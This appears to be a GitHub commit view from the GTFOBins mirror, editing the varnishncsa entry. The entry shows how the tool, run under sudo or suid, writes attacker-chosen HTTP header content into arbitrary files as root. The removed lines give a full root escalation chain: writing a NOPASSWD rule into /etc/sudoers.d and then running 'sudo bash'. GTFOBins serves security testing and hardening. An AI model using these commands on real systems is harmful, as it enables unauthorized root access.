1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 07:49:17 +01:00

Polish varnishncsa

This commit is contained in:
Andrea Cardaci 2023-12-23 12:40:09 +01:00 committed by GitHub
parent 0190295ed2
commit efaf1b11e8
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

@ -1,8 +1,18 @@
--- ---
description: varnishncsa utility reads varnishd shared memory Varnish logs and presents them in the Apache / NCSA "combined" log format. description: |
This allows to write arbitrary files as root, provided that the proper HTTP response is made. Specifically the content of a certain header will be written in the file. First start `varnishncsa` as follows, then trigger the file write with:
```
curl -H 'yyy: DATA' http://localhost:6081/xxx
```
description:
functions: functions:
sudo: sudo:
- code: sudo varnishncsa -g request -q "ReqURL ~ \"/exploit_randomfoo\"" -F '%{exploit}i' -w /etc/sudoers.d/user & code: |
- code: curl -H 'exploit: user ALL = (ALL) NOPASSWD: ALL' localhost:6081/exploit_randomfoo LFILE=file_to_write
- code: sudo bash sudo varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
--- suid:
code: |
LFILE=file_to_write
./varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
---